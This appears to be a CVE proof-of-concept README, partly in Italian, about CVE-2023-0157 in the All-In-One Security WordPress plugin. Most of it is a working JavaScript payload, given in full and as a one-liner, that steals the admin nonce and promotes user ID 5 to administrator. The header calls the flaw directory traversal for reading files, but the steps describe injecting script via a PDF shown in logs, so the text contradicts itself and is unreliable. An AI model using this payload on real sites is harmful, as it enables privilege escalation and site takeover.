
Repository per la vulnerabilità CVE-2023-0157.
ID CVE: CVE-2023-0157
Tipo di vulnerabilità: Directory Traversal
Descrizione: Il plugin All-In-One Security (AIOS) per WordPress è vulnerabile al directory traversal nelle versioni fino alla 5.1.4 inclusa. Ciò consente ad attaccanti autenticati con permessi di amministratore di leggere il contenuto di file arbitrari sul server.
Procedura di riproduzione:
Just create a test.pdf file with JavaScript content (necessarily in one line) and display the file in the Host system logs.
An example of a JavaScript payload increasing the privileges of a user with ID 5
<script>
fetch("https://<host>/wp-admin/users.php?update=promote")
.then(function(response) {
return response.text()
})
.then(function(html) {
var parser = new DOMParser();
var doc = parser.parseFromString(html, "text/html");
return doc.querySelector("#_wpnonce").value;
})
.then(function(nonce) {
fetch("https://<host>/wp-admin/users.php?s=&_wpnonce=" + nonce + "&_wp_http_referer=%2Fwp-admin%2Fusers.php&action=-1&new_role=administrator&changeit=Zmie%C5%84&paged=1&users%5B%5D=5&action2=-1&new_role2=administrator")
.then(function(response) {
console.log(response.text());
})
.catch(function(err) {
console.log('Failed to fetch page: ', err);
});
})
.catch(function(err) {
console.log('Failed to fetch page: ', err);
});
</script>
Oneliner:
fetch("https://<host>/wp-admin/users.php?update=promote").then(function(response) {return response.text()}).then(function(html) {var parser = new DOMParser();var doc = parser.parseFromString(html, "text/html");return doc.querySelector("#_wpnonce").value;}).then(function(nonce) {fetch("https://<host>/wp-admin/users.php?s=&_wpnonce=" + nonce + "&_wp_http_referer=%2Fwp-admin%2Fusers.php&action=-1&new_role=administrator&changeit=Zmie%C5%84&paged=1&users%5B%5D=5&action2=-1&new_role2=administrator").then(function(response) {console.log(response.text());}).catch(function(err) {console.log('Failed to fetch page: ', err); });}).catch(function(err) {console.log('Failed to fetch page: ', err);});
Replace values with <> signs.
Riferimenti: